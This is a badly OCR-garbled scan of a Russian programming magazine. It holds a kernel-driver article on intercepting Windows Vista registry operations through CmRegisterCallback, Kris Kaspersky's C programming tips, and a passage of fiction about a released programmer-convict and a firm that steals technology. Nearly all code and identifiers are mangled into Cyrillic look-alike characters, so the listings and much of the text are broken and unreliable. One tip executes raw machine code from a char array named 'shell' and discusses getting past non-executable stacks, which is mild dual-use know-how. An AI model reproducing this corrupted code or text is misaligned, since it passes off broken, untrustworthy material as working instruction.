РЕ6_ЕМиМЕРАТЕ_КЕѴ_ШР0РМАТІ0М 


ЕурейеС зРгисР _КЕС_Р08Т_ 


РеоМтРозтЕмсімекатеКеу 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0Ы 


ОРЕКАТІОЫ_ІЫРОЕМАТІОЫ { 


РеоМтЕыомеішеѴашеКеу 


РЕ6_ЕМиМЕРАТЕ_ѴАШЕ_КЕѴ_ІМР0РМАТІ0М 


РѴОІБ ОЬ] еср ; 


РеоМтРкеЕмомекатеѴашеКеу 


РЕ6_ЕМиМЕРАТЕ_ѴАШЕ_КЕѴ_ІМР0РМАТІ0М 


КГГЗТАТІТЗ ЗТаЬіз; 


РеоМтРозтЕмомекатеѴашеКеѵ 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0Ы 


РѴОІБ РгеІпбогшаДіоп; 


РеоМтСЮекуКеу 


РЕ6_СШЕРѴ_КЕѴ_ІМР0РМАТІ0М 


ЫТЗТАТБЗ РеДигпЗДаДиз ; 


КеоМтРреОоекуКеу 


РЕе_СШЕРѴ_КЕѴ_ІМРОРМАТІОМ 


РѴОІБ СаИСопДехС; 


КеоМтРо5тОоеруКеу 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0М 


РѴОІБ ОЬдесДСопДехС; 


КеоМтОоеруѴашеКеу 


РЕС_ОІІЕРѴ_ѴАШЕ_КЕѴ_ШРОРМАТІОМ 


РѴОІБ Кезегѵесі; 


РеоМтРкеОоеруѴашеКеу 


РЕ6_аіІЕРѴ_ѴАІ.иЕ_КЕѴ_ШР0РМАТІ0М 


} КЕС_РОЗТ_ОРЕРАТІОЫ_ 


РЕеМтРогтОиЕРУѴдшЕКЕУ 


РЕе_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0М 


ІЫЕОЕМАТІОЫ, *РКЕС_РОЗТ_ 


РЕОМтСІІІЕКУМиі.ТІРІ.ЕѴАШЕКЕУ 


РЕ6_01ІЕРѴ_Миі-ТІРІ-Е_ѴАІ-иЕ_КЕѴ_ШР0РМАТІ0М 


ОРЕКАТІОЫ_ШРОКМАТІОЫ ; 


РЕОМтРКЕОііЕРУМіЛ-ТІРІ.ЕѴАШЕКЕѴ 


РЕ6_0иЕРѴ_МиЕТІРЕЕ_ѴАЕиЕ_КЕѴ_ШР0РМАТІ0М 




РЕСМтР05ТОиЕКУМиі_ТІРІ_ЕѴАШЕКЕѴ 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0Ы 


Здесь наиболее интересны следующие значе- 


РеоМтРреСреатеКеу 


РЕ6_РРЕ_СРЕАТЕ_КЕѴ_ШР0РМАТІ0Ы 


ния. Зіаіиз — результат выполненной опера- 


РеоМтРреСреатеКеуЕх 


РЕ6_СРЕАТЕ_КЕѴ_ШР0РМАТІ0М 


ции. Ргеіпііэгтабоп — указатель на структуру с 


РеоМтРозтСкеатеКеу 


РЕ6_Р05Т_СРЕАТЕ_КЕѴ_ШР0РМАТІ0М 


информацией, которая предшествовала опера- 


РеоМтРозтСкеатеКеуЕх 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0М 


ции, в нашем случае это указатель на структуру 


РеоМтРкеОремКеу 


РЕ6РРЕ0РЕМКЕѴІМР0РМАТІ0М 


РЕб_ОЕЕЕТЕ_ѴАШЕ_КЕУ_ІМРОРМАТІОМ. 


РеоМтРкеОремКеуЕх 


РЕ60РЕМКЕѴІМР0РМАТІ0М 


РеІигпВіаІиБ — значение, которое вернетсис- 


РеоМтРозтОреыКеу 


РЕ6_Р05Т_0РЕМ_КЕѴ_ІМР0РМАТІ0М 


тема вызывающему потоку. 


РеоМтРо5тОреыКеуЕх 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0М 


Теперь сам код. Первым делом зарегис- 


РеоМтКеуНаыоіеСеозе 


РЕ6_КЕѴ_НАМ0І-Е_СІ-05Е_ШР0РМАТІ0М 


трируем свой саІІЬаск-вызов в системе. 


РесМтРкеКеуНамоі_еСі.05Е 


РЕ6_КЕѴ_НАМ0І-Е_СІ-05Е_ІМР0РМАТІ0М 


Сделать это можно, когда угодно, но я буду 


РеоМтРозтКеуНамоі.еСі.05Е 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0М 


регистрировать его на этапе загрузки драй- 


РеоМтРкеРшзнКеу 


РЕ6_РШ5Н_КЕѴ_ШР0РМАТ!0М 


вера в систему. 


РеоМтРозтРшзнКеу 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0М 




РеоМтРкеі-ОАоКеу 


РЕ6_І-0А0_КЕѴ_ШР0РМАТІ(Ж 


ОШѴЕКЕМТРѴ 


РеоМтРозті-ОАоКеу 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0Ы 


ЪАРСЕ_ІШ'ЕСЕК Соокіе; 


РеоМтРкеіімі-ОАоКеу 


РЕ6_ІІМІ-0А0_КЕѴ_ШР0РМАТІ0М 




РеоМтРо5Тіімі-ОАоКеу 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0Ы 


ЫТЗТАТБЗ БгіѵегЕпДгу (Ш 


РЕОМтРВЕООЕКУКЕУЗЕСиВІТУ 


РЕ6_СШЕРѴ_КЕѴ_5ЕСиРІТѴ_ІМР0РМАТІ0М 


РБКІѴЕК_ОВ^СТ рБгіѵегОЪ^ есЬ , Ш 


РЕеМтРо5тОиЕРУКЕУ5Есикіту 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0Ы 


РШІСОБЕ_ЗТКШО рКедізДгуРаСІі ) 


РЕОМтРКЕЗЕТКЕУбЕСиРГГУ 


РЕ6_5ЕТ_КЕѴ_5ЕСиРІТѴ_ІМР0РМАТІ0М 


{ 


РЕеМтР05Т5ЕТКЕУ5ЕС0КІТУ 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0М 


ЫТЗТАТБЗ зкаДиз ; 


РЕеМтСди.вАскСомтЕхтСі.ЕАмир 


РЕ6САІ-1-ВАСКС0МТЕХТСІ-ЕАМІІРІМР0РМАТІ0М 
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//дополнительные действия по инициализации 
драйвера 

зЬабиз = СшКедізРегСаІІЬаск (КедізбгуСаІІЪаск, 
ШЬЬ, &Соокіе) ; 

геЪигп збабиз; 

} 

Как видно из приведенного кода, мы просто вызвали СтВедізіегСаІІЬаск 
с «правильными» параметрами. Теперь займемся непосредственно 
самой функцией перехвата. 

РУТИНА КЕеі5ТКѴСАІ_І_ВАСК 
И ВСПОМОГАТЕЛЬНЫЕ ФУНКЦИИ 

ЫТЗТАТБЗ РгеЗебѴаІиеКеу (ІЫ РКЕО_ЗЕТ_ѴАШЕ_КЕУ_ 
ІЫРОКМАТІОЫ іпбо) 

{ 

ЫТЗТАТОЗ збабиз; 

//вьліолняем нужные нам действия 
геЪигп збабиз; 

} 

ЫТЗТАТБЗ РозбБеІебеѴаІиеКеу (Ш РЕЕС_РОЗТ_ОРЕКАТІОЫ_ 
ШЕОЕМАТІОЫ іпбо) 

{ 

ЫТЗТАТІІЗ зЦаРиз ; 

//вьліолняем нужные нам действия 
геСигп збабиз; 

} 

ЫТЗТАТІІЗ КедізбгуСаІІЪаск ( Ш РѴОІБ СаНЬаскСопРехЦ , 

Ш РѴОІБ АгдишепРІ , Ш РѴОІБ АгдишепР2 ) 

{ 

ЫТЗТАТІІЗ збабиз ; 

зміЬск ( (КЕС_ЫОТІЕУ_СЬАЗЗ) АгдишепШ) 

{ 



сіеЕаиІЬ: 

збзбиз = ЗТАТІІЗ_ЗІІССЕЗЗ ; 

Ьгеак; 

} 

геСигп зЦабиз; 

} 

Как мы убедились, не такое уж и сложное это дело — перехват обраще- 
ний к реестру. Но просто перехватить операцию создания или удаления 
ключа/параметра реестра мало. Надо еще уметь хоть что-то сделать в 
этом перехвате. 

Узнаем имя ключа 

Когда мы перехватывали создание и удаление параметра реестра, мы 
всегда получали указатель на объект ключа. Допустим, нам надо следить 
за изменениями только в ключах автозагрузки. Для этого нам надо одно- 
значно идентифицировать, в каком месте реестра создается параметр. 
Сделать это можно функцией СтСаІІЬаскбеЖеуОЬіесШ. 

ЫТЗТАТІІЗ 

СтСаІІЪаскСебКеуОІ^ есШБ ( 

Ш РЬАЕСЕ_ІЫТЕСЕЕ Соокіе, 

ІЫ РѴОІБ (ВДесб, 

ОТЛТ ОРТІОЫАЬ Рі;ЬОЫС_РТК ОЬ:есбІБ, 

ОБТ ОРТІОЫАЬ РСШІСОБЕ_5ТКШС *ОЬ;і есбЫате 
) ; 

Здесь 0Ь|ес1 — это указатель на объект, полученный в структуре информа- 
ционного класса. 0Ь]’ес1:Ю — указатель на переменную, куда запишется 

Ю объекта, а О^’есЖате — указатель на строку типа Ы N I С О О Е 5Т Р I N 0 , 

которая после вызова функции будет содержать полное имя ключа. 
СтСаІІЬаск6еЖеуОЬіес1:Ю вызывается при ІВСН_, меньшем или равном 
АРС_І_ЕѴЕІ_, и работаеттолько вѴѴіпсіоѵѵзѴІБІа. 

Заключение 

Вот и все. Теперь мы можем написать собственный РедМоп, который 
будет работать в ѴѴіпсІоѵѵз Ѵізіа. Конечно, чтобы создать что-то более- 
менее приемлемое, надо изучить всетонкости программирования в 
режиме ядра и много практиковаться. Тем, кто уже имеет неплохой стаж 
в рассматриваемой области, эта статья, надеюсь, тоже пригодится, так 
как любимый всеми патч таблицы системных сервисов в Висте прикры- 
ли, а отслеживать обращения к реестру никому не помешает. ПО. 
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Трюки от крыса 

Программерские трюки и фичи от Криса Касперски 



Вычисления гапсі() на стадии компиляции 

У Препроцессор в Си — великая вещь, однако его возмож- 
ности существенно ограничены, и нередко, чтобы осуществить за- 
думанное, приходится извращаться не по-детски. Достаточно часто 
программистам требуется получить случайное число, уникальное для 
каждого билда, но не меняющееся от запуска кзапуску програм- 
мы. Существует множество решений этой проблемы. В частности, 
линкер иііпк использует штамп времени, содержащийся в заголовке 
РЕ-файла, однако этотспособ системно-зависимый и, что самое 
неприятное, не работающий на некоторых ІІЫІХ-подобных осях, где 
ЕІ_Р-заголовок вообще не проецируется на адресное пространство 
процесса. 

Некоторые программисты поступаюттак: подключают включаемый 
файл х-біе. б директивой #іпсІисІе, создают простую утилиту на Си, 
которая генерирует х-біе.б следующего содержания: #бебпеХ_ВАМО 
ОхХХХХХХХХ, где ОхХХХХХХХХ — случайное число, возвращаемое 
функцией гапсК), а в такебіе-файл вставляют команды компиляции 
этой вспомогательной утилиты, ее линковку и запуск. После создания 
х-біе.б можно собирать файл проекта. Достоинство этого трюка в его 
переносимости, а недостаток в излишней громоздкости. Сгенериро- 
вать уникальное для каждого билда число можно и проще! 
Компиляторы, придерживающиеся АІЧ5І Си, имеютв своем «словар- 
ном запасе» макросы йАТЕ и ТІМЕ , возвращающие дату и 

время компиляции файла соответственно. Оба значения представ- 
лены в строковом формате, от которого приходится избавляться пу- 
тем вычисления хэш-суммы по СРС32 или любому другому алгорит- 
му. Для достижения большей случайности полученное число можно 
передать функции згапсіО с последующим вызовом гапсК). 

Также можно использовать макрос ТІМЕ5ТАМР , возвращающий 

штамп даты/времени последней модификации компилируемого фай- 
ла в виде 32-битного целого, что избавляет нас от необходимости вы- 
числения СРС32. Однако если файл, содержащий ТІМЕ5ТАМР , 

не будет изменен, мы получим то же самое число, что и в предыдущем 
билде. В некоторых случаях это неприемлемо, в некоторых, напротив, 
даже оченьжелательно (то есть сгенерированное число изменяется 
только в случае изменения файла). 

ИСПОЛЬЗОВАНИЕ МАКР0СА_ТІМЕ5ТАМР_ДЛЯ ГЕНЕРАЦИИ 
СЛУЧАЙНОГО ЧИСЛА, УНИКАЛЬНОГО ДЛЯ КАЖДОГО БИЛДА 

іпс х_гап<і; 
таіп ( ) 

{ 



згапсі ( ТІМЕЗТАМР ) ; 

х_гапс! = гапсі ( ) ; 



} 



02 



Строковые литералы и тип сНаг 

Рассмотрим следующий код, вполнетипичный для начина- 
ющих. Что в нем неправильно? 



ПРИМЕР НЕПРАВИЛЬНОГО ИСПОЛЬЗОВАНИЯ СНАК*, НЕЯВНО 
ИСПОЛЬЗУЮЩИЙ НЕКОТОРЫЕ ОСОБЕННОСТИ ПОВЕДЕНИЯ 
КОМПИЛЯТОРА 

!оо (сЬ.аг *з) 

{ 

} 



ІТ ( * з < 'я') геЬигп 'ты'; 



Опытным программистам известно, что стандарт АЫ5І Си позволяет 
компиляторам самостоятельно решать, должен тип сбагбытьзнаковым 
или нет. Поэтому, если число укладывается в [0, 1 27], мы вправе исполь- 
зовать сбаг— программа будет работать независимо от наличия знака. 

В противном случае следуетявно специфицировать тип, указывая перед 
сбаг, каким ему быть: зідпесі или ипзідпесі. 

Компилятор Місгозоб:ѴІ5иаІС++ по умолчанию всегда выбирает 
ипзідпесі сбаг, поэтому данная программа будет работать правиль- 
но. Однако стоит откомпилировать ее с помощью Вогіапсі С++, как 
все изменится и мы получим совершенно неожиданный результат. 
Компилятор поумолчанию устанавливает сбаг в зідпесі, в результате 
чего строковой литерал 'я' превращается в число -1 7 и условие 
(*з < 'я') окажется в косяках, что наглядно подтверждает дизассемб- 
лерный листинг, приведенный ниже: 

РЕЗУЛЬТАТ РАБОТЫ КОМПИЛЯТОРА ВОКЬАЫО С++, ПЕРЕМЕННАЯ 
СНАК *5 ТРАКТУЕТСЯ КАК 5І6ЫЕ0 СНАК* 

_ТЕХТ : 00000000 _:Еоо ргос пеаг 
_ТЕХТ: 00000000 агд_0 = сЫогй. рЦг 8 



_ТЕХТ: 00000000 
_ТЕХТ: 00000001 
_ТЕХТ: 00000003 
_ТЕХТ : 00000006 
_ТЕХТ: 00000009 



ризЪ еЬр 

гпоѵ еЪр, езр 

гпоѵ еах, [еЬр+агд_0] 

сшр ЪуЬе рЦг [еах] , — 17 

зде збюгЩ 1ос_2 0 

; знаковое сравнение ! 
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_ТЕХТ : 0000000В 




ГПОѴ 


еах, 0ЕВЕ2Ь 


_ТЕХТ: 00000010 


1ос_20 : 






_ТЕХТ: 00000010 




рор 


еЬр 


_ТЕХТ: 00000011 




гебп 




_ТЕХТ: 00000011 


_боо 


епбр 





Самое большое коварство этой проблемы заключается втом, 
что она не проявляется в английских программах, поскольку 
символы английского алфавита сосредоточены в первой 
половине АБСІІ -табл и цы и потому знака «минус» в них просто не воз- 
никает! А вот после русификации он неожиданно вылезает в самых 
разных местах, разваливая программу и порождая трудноуловимые 
баги. 

Выход из нескольких циклов сразу 

Начинающие программисты постоянно задают мне один итот 
же вопрос: как выйти из двух и более циклов сразу? Средствами струк- 
турного программирования никак не получается. То есть получается, 
конечно, но приходится использовать флаги, проверяемые в каждом 
цикле, что нетолько громоздко, ненадежно, ненаглядно, но еще и 
непроизводительно. Современные процессоры не любят ветвлений, и 
каждая лишняя проверка сжирает кучутактов, особенно на нерегуляр- 
ных переходах, которые невозможно предсказать. 

Выход состоит в использовании горячо критикуемого доіо, который 
обвиняют в неструктурности и вообще в «идеологической неправиль- 
ности». Действительно, при злоупотреблении доіо программа превра- 
щается в спагетти и ее становится совершенно невозможно отлаживать, 
поскольку непонятно, как мы вообще попали в этот блок кода и какая 
зараза совершила сюда переход. Но сравни два следующих фрагмента 
кода: 

ВЫХОД ИЗ ТРЕХ ЦИКЛОВ С ИСПОЛЬЗОВАНИЕМ ОПЕРАТОРА ООТО 

бог ( ... ) 

{ 

бог (...) 

{ 

бог (...) 

{ 

іб (...) добо бо_ехіб; 

} 

} 

} бо_ехіб : 

ВЫХОД ИЗ ТРЕХ ЦИКЛОВ БЕЗ ИСПОЛЬЗОВАНИЯ ОПЕРАТОРА ООТО 

іпб бо_ехіб = 0; 
бог (...) 

{ 

бог (...) 

{ 

бог (...) 

{ 

іб (...) 

{ 

бо_ехіб = 1; 

Ьгеак; 

} 

} 

іб (бо_ехіб) Ьгеак; 

} 

іб (бо_ехіб) Ьгеак; 

} 



Не кажется ли тебе, что этот код намного более нагляден и в нем 
гораздо труднее совершить ошибку, чем в «идеологически пра- 
вильном» варианте? Увы! В некоторых случаях, использование 
доіо строго запрещено принятыми корпоративными правилами 
кодирования, против которых не попрешь. Воттакая, значит, 
бюрократия. 

Переносимые ассемблерные вставки 

Когда возможностей, предоставляемых языком Си, ока- 
зывается недостаточно (например, требуется прочитать значение 
регистра-счетчика команд), программисты обычно прибегают к 
ассемблерным вставкам. 

Проблема втом, что способ оформления ассемблерный вставок не 
стандартизован и каждый компилятор делает это по-своему. Ктомуже 
даже в рамках х86-процессоров существует как минимум два ассемб- 
лерных синтаксиса: Іпіеі, поддерживаемый ѴѴіпсІо\л/5-компиляторами, 
и АТ&Т, поддерживаемый, например, 6СС. 

Одно из решений состоитв переводе ассемблерной вставки в машин- 
ный код (что очень удобно делать в Ьіеѵѵ'е) с последующим размеще- 
нием ее в локальном массиве, указатель на который преобразуется 
в указатель на функцию, запускаемую на выполнение с передачей 
аргументов через стек потому или иному соглашению. 

Практический пример использования такого трюка приведен ниже: 

ПРИМЕР ВСТАВКИ МАШИННОГО КОДА В СИ-ПРОГРАММУ 

іпб ( *боо) () ; 

Ьаг ( ) 

{ 

// объявляем массив и заполняем его машинным кодом 
сЬаг зЬеІІ [ ] =" \хОР\х31\хСЗ " ; // КБТ8С + КЕТЫ 

боо = ( іпб ( * ) ( ) ) зЬеІІ ; 

// вызываем функцию боо, возвращая результат ее 
выполнения 

// для простоты результат усекается до 32 бит, 
передаваемых в регистр ЕАХ 

// старшие 32 бита, помещаемые командой КБТЗС в 
регистр ЕБХ, мы отбрасываем 
гебигп боо ( ) ; 

} 

гпаіп ( ) 

{ 

іпб а; 

а = Ьаг ( ) ; 

} 

Единственный существенный недостаток этого метода втом, 
что на осях с неисполняемым стеком он не работает, и приходится 
вызывать системно-зависимые функции для установки 
соответствующих атрибутов доступа к памяти: ѴігбиаІРгобесбО 
на ѴѴі псіоѵѵз и тргоІесШ на I) N IX. Вокруг них приходится делать 
свои «обертки» (они же «врапперы» от английского ѵѵгаррег), 
вызываемые перед передачей управления на функции боо () . 

Но и в этом случае у нас нет никаких гарантий, что ось позволит 
выполнить код. В частности, некоторые ІІІМІХ-подобные системы 
на процессорах, не поддерживающих биты ЫХ/Хй (атрибуты 
исполнения кода на уровне страниц), размещают стек в области 
памяти, управляемой селектором, устанавливающим права 
доступа только на чтение/запись (без возможности 
исполнения) и потому игнорирующим вызов тргоіесі: 
(„РВ0Т_ЕХЕС)-к= 
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му все вернули. Часы, пустой бумажник — больше и не было 
ничего. Сложили все это в бумажный пакет, протянули в 
маленькое окошко в зарешеченной стенке. 

— Лукьянов Сергей Петрович, вы считаетесь отбывшим 
свой срок исправительно-трудовых работ и можете быть выпущены на 
свободу... 

Он откашлялся, надеясь ответить что-нибудь. Не получилось. В горле 

— ни звука. Лукьянов попытался расправить на себе смятый пиджак, 
который пролежал на складе четыре с половиной года. Вышло ничуть не 
лучше, чем с прощальной речью. Тогда он махнул рукой, улыбнулся, гордо 
поправил несуществующий галстук и вышел на улицу. 

Яркое солнце, горячий асфальт. Никто неждал его у огромныхжелезных 
ворот. Лукьянов прищурился, привыкая к свету. 

— Свобода... — прошептал он, ощутив, наконец, в себе способность 
разговаривать. — Я уже и забыл, как это — быть свободным. 

Он делал первые шаги в так долго закрытом для него мире, словно входил 
в холодное море. Поначалу робко, ожидая лязга запоров за спиной и 
окрика с вышки; потом все увереннее иувереннее... 

Автоматчик, стоявший в наряде над воротами, шмыгнул носом, поправил 
оружие и отвернулся в сторону внутреннего двора и шлюза ворот. Свобод- 
ные люди были ему неинтересны. 

До автобусной остановки примернотри километра. Лукьянов потихоньку 
набрал приличный темп; несмотря на жару, идти было легко. 

— Дорога домой должна быть короче... — напевал он себе под нос люби- 
мые песни. 

—Три, двенадцать, семь.. . — временами произносил он какие-то числовые 
заклинания, умудряясь даже рифмовать эти цифры с«Аквариумом» и многими 
другими — вспомнил и «Кино», и «Черный кофе». Апофеозом же стала песня «Я 
свободен». Дойдя до нее в своем стихийном хит-параде, онуже не пел, а просто 
орал текст Кипелова в летнее марево. «Свет проходит сквозь меня !» — а следом: 
« Ш есть, тр и , тр идцать восемь...» 

Когда он дошел до автобуса, голос был сорван окончательно... 

Квартира встретила его нето чтобы хмуро, но как-то недружелюбно. Он 
еще на подступах к своей двери увидел остатки желтого пластилина, 
которым была опечатана квартира во время следствия (Лукьянов тогда 
уже сидел в СИЗО, и жилье вместе со всем барахлом внутри было одним 
большим вещественным доказательством). Подойдя поближе, Сергей 
прикоснулся пальцами кжелтому пятну. Местами еще виднелись следы 
печати и обрывки той бумажной полоски, что защищала его квартиру 
не хуже любого замка. 

— Охранное заклинание Ночного Дозора, — Лукьянов покачал головой 
и пальцем смазал с пластилина все намеки на МВД. Поискав в пиджаке 
ключи, он посетовал на то, что не догадался найти их раньше. В ведомос- 
ти они значились вместе с часами, но в руки их не дали — вполне могло 



быть, что связка затерялась где-нибудь в дебрях спецхрана в тюрьме. Но 
ключи нашлись и привычно легли в руку. 

Внутри было совсем грустно — если переддверью еще какие-то светлые 
мысли приходили в голову, то в квартире они быстро улетучились. Уже на 
пороге Сергей споткнулся об упавшую холостяцкую вешалку и едва не 
рухнул. На полу была разбросана одежда: какие-то куртки, зимняя шапка, 
наполовину съеденная молью. Когда Лукьянов поднял ее с пола и встрях- 
нул, она облетела, словно одуванчик. 

— Хорошо, что сейчас лето, — он бросил ее обратно, вспоминая, что 
забирали его какраззимой. Повалили на пол, пару раз дали по ребрам; 
эта чертова вешалка упала на кого-то из группы захвата... 

Шапка, превратившаяся в одночасье втюбетейку, словно колесо, 
откатилась куда-то в угол. Лукьянов шагнул в комнату, на мгновение 
задумавшись, разуваться или нет, но на полулежал многолетний слой 
пыли, который напрочь отбил это желание. Дверь распахнулась со 
скрипом — воздух был чужим, затхлым. Сергей поморщился и поспешил 
открыть окно, спугнув голубей на подоконнике. Птицы явно привыкли к 
тому, что здесь нетлюдей, и вели себя довольно вольготно, поэтому грохот 
шпингалета повергих поначалу в ступор, а потом в панику. Они рванули 
в разные стороны, сталкиваясь между собой, стаким громким хлопаньем 
крыльев, что напугали и Сергея. Он отшатнулся от окна, выругался зло, 
по-тюремному, но потом его окутала горячая волна стыда, и он, провожая 
взглядом разлетающихся птиц, напомнил себе, что уже не на зоне. Что 
теперь все будет по-другому. 

Ветер, ворвавшийся в квартиру вместе с хлопаньем крыльев, принес 
уверенное чувство свободы. Та проклятая жизнь осталась за плечами. 

Он преодолел ее. Вынес все тяготы. Победил. Четыре с половиной года 
выкинуты из жизни, однако сожалеть об этом он не будет. 

Потому что у него есть план. 

Но сначала не мешало бы перекусить. 

...Через деньон более-менее освоился в квартире и перестал прислу- 
шиваться к стукам соседей за стенами (у них, похоже, шел ремонт, а 
Лукьянову каждая дробь молотка казалась каким-то зашифрованным 
посланием оттех, кто сидел в соседних камерах). Холодильник, на 
удивление, заработал — пришлось приложить максимум усилий, но зато 
теперь можно было не бояться подхватить какую-нибудь инфекцию в этой 
проклятой жаре, которая уже и не радовала... 

На то, что в квартире останется телевизор, Лукьянов не рассчитывал — 
и оказался прав. Пришлосьограничиться маленьким китайским прием- 
ником, найденным на кухне, но пока ему больше ничего и не было нужно. 
Узнавая новости, он пытался выстроить картинутой страны, что была 
сейчас за окном. Получалось с трудом. Втюрьме его система жизненных 
ценностей претерпела серьезные изменения, и сейчас надо было не 
просто менять ее — требоваласьтотальная ломка. 
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Денегему по освобождению дали всего ничего. Не заполнив холо- 
дильник и на десять процентов даже полуфабрикатами, Сергей понял, 
что протянет на лапше и пирожках недолго. Уже на третий день своей 
свободной жизни он вочередной раз произнес числовое заклинание в 
виде недоступного пониманию обывателя ряда цифр и подошел кокну. 
Путем несложного анализа и расставления карандашных крестиков на 
известке он определил, что существует минимум три машины, которые 
несут дежурство у него под домом. Анализировать ситуацию он за все это 
время не разучился, и выходилотак, что его возвращения ждали. Причем 
ждали явно не друзья. 

Очень хотелось помахать этим идиотам из-за занавески рукой — Лу- 
кьянов струдом удерживал себя от столь опрометчивого шага. Нельзя 
было раскрыватьсвоих намерений, нельзя было дразнить этого спящего 
монстра, уверенного в том, что ситуация под контролем. 

— Ну что ж, нельзя так нельзя, — Лукьянов аккуратно отпустил штору и 
вернулся в комнату. В очередной раз он осмотрел свое подпорченное 
оперативниками хозяйство итолько утвердился в своем нежелании 
наводить тут порядок. 

— Незачем, — покачал он головой. — Я здесь ненадолго. 

«Двадцать шесть, — подумал он. — Потом дважды по четыре». 

Он не зря назвал тюрьму «золотой клеткой». Зона, где он провел весь свой 
срок, была редкой, но далеко не единственной на бескрайних просторах 
России. Там отбывали срокте преступники, чье вынужденное бездействие 
во время заключения можно былотоже рассматривать как нарушение 
закона. Ученые, программисты, инженеры — да мало ли несчастных, 
оказавшихся не вто время не втом месте. Кто-то случайно сбил человека, 
высчитывая за рулем траекторию движения спутника; кто-то повздорил 
с женой и толкнул ее на камин в гостиной; а кто-то просто украл чужую 
собственность и продал сотням и тысячам покупателей, выдав за свое 
творение. Да что там греха таить, такое происходит сплошь и рядом! 
Государство решило, раз эти люди преступили закон, то пусть поработают 
на благо общества не за зарплату, награды и премии, а за трехразовое 
питание. И появились зоны, которые работали почище научных центров 
и выдавали столько полезной информации, что содержать этих людей по- 
добным образом оказывалось выгоднее, чем на свободе. Ведь основная 
масса ученых была предана науке и смирялась со своим положением, не 
в силах преодолеть тягу к работе. 

Благодарности и очередные звания получалотюремное начальство, а те, 
на ком они делали себе карьеру, создавали для страны оружие, машины, 
программы и молча ждали конца своего срока. Многие из этих людей в 
тюремных робах сделали для своей страны намного больше, чем куча 
бездельников на воле. Сделали — а потом получили справку об осво- 
бождении, вышли на свободу и не смогли найти своего места. Клеймо 

— на всюжизнь. И не меньше половины из них возвращалось назад, на 
свободное поселение. 

Четыре с половиной года назад на такую зону попал и Сергей Лукьянов 

— преуспевающий молодой сотрудник достаточно крупной фирмы. 

Фирма эта делала программы для малого и среднего бизнеса — делала, 
как казалось Лукьянову, хреново. За тот год, что он успел отработать в 
фирме, он внимательно изучил рынок и потенциал сотрудников и пришел 
к выводу, что можно выпускать продукцию гораздо более качественную, 
чем та, что производилась в тот момент. 

Несколько предложений, с которыми он обращался к начальству, ос- 
талось без ответа. Казалось, что всех устраивает достигнутый уровень, 
устраиваетто, что вокруг масса преуспевающих конкурентов. Более 
того, временами он чувствовал, что своей инициативой нарушает 
какие-то известные только начальству договоренности. Отношение к 



нему в фирме было двойственным: с одной стороны, всех восхищала 
его квалификация как программиста, с другой — руководству явно 
была не нужна инициатива. Сергей написал пару модулей, значитель- 
но улучшающих работу имеющегося софта, — и был крайне удивлен, 
узнав, что их отвергли без объяснения причин. Тогда он с божьей 
помощью внедрил один из них в код основного продукта фирмы — и 
был поражен, когда понял, что этого никто не заметил. Руководитель 
проекта часами просиживал в интернете, без конца что-то там разыс- 
кивая, — ему явно было не до работы. Лукьянов удивился в последний 
раз — и перестал напрягаться. 

Так продолжалось довольно долго — нудное сидение в офисе, симуляция 
работы. Когда главный программистобратился к нему с предложением 
выпить по чашечке какого-нибудь благородного напитка в ближайшем 
кафе, Лукьянов взволновался — он не предполагал, что на фирме его 
рассматривают как кандидатуру для подобных бесед. Ато, что он услышал 
в кафе, просто повергло его в шок. 

Фирма была тенью. Тенью большого преступного концерна, занимающе- 
гося ни много ни мало воровством высокихтехнологий. Специалисты, 
которые состояли в штате фирмы, делали совсем не то, что им было 
положено по статусу. Этакий идеальный «союз рыжих», описанный еще 
Конан Дойлем. Одни писали бредовые утилитки для бизнеса, а другие, 
прикрываясь этим, таскали с чужих компьютеров все, что плохо лежало. 
Лукьянову сделали предложение. Хорошее, серьезное предложение. 

Когда перед ним на столик кафе легли все его старые разработки, которые, 
по его мнению, остались незамеченными, он понял, что сильно ошибался 
в людях, с которыми работал. Кто-то в этой фирме очень четко отбирал 
кадры. Судя потому, насколько грамотно и полно был сделан анализ его 
разработок, этот «кто-то» имел глубокие познания в программировании. 

— Вы идеально провернули этотфокус, — сказал тогда собеседник, без- 
звучно опуская чашечку с кофе на блюдце. — Но в нашей конторе сложно 
остаться незамеченным, тем более ста кими способностями, каку вас. Не 
сразу, но достаточно быстро вы оказались под пристальным вниманием 
тех, кому небезынтересны люди талантливые и инициативные. Я хочу 
предложить вам работу, которую вы делали и раньше, воттолько оплачи- 
ваться она будет на порядок выше. 

И главный программист объяснил сутьдела. Его подчиненные (настоящие 
подчиненные, а не те, что служили прикрытием для дела) сумели увести у 
одной известной фирмы разработанный ими процентов на сорок програм- 
мный продукт. На вопрос: «Что это за фирма?» — ответа не последовало. 

— Я хочу, чтобы вы приложили все свои способности и доделали то, что 
начато другими. Если мы успеем раньше конкурентов — мы на коне. 

— Аесли нас поймают? — спросил Лукьянов. 

— Вас, — тутже уточнил собеседник. — Вотв этом и заключается наша 
страховка. В случае провала этой затеи вы возьмете все на себя. А мы 
обеспечим вашу семью деньгами на весьтотсрок, что вы проведете в 
местах не столь отдаленных. 

— Вы считаете, что вероятность неблагоприятного исхода велика? 

— Сергей чувствовал, что у него предательски дрожат руки. 

— Это все из области фантастики, — усмехнулся главный программист. 

— Никто и никогда не рассчитает вам эту вероятность. Все будетзависеть 
от вас, оттого, насколько успешно вы сможете выдать чужое за свое. Я 
изучал материал, могу вас уверить, основная работа там уже проделана. 

— Сорок процентов — это, по-вашему, основная работа? 

— Это фундамент. У вас есть два месяца для того, чтобы превратить 
данные, которые я передам вам, в нечто удобоваримое и совершенно 
легальное. Вы сможете? 

— Насколько великобъем работ? — Лукьянов поинтересовался аб- 
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солютно машинально, но собеседник расценил это как потенциальное 
согласие. 

— Над этим проектом работало шесть человек, — он развел руками. 

— Вам я могу выделить еще двоих. Обязательноеусловие — они недолж- 
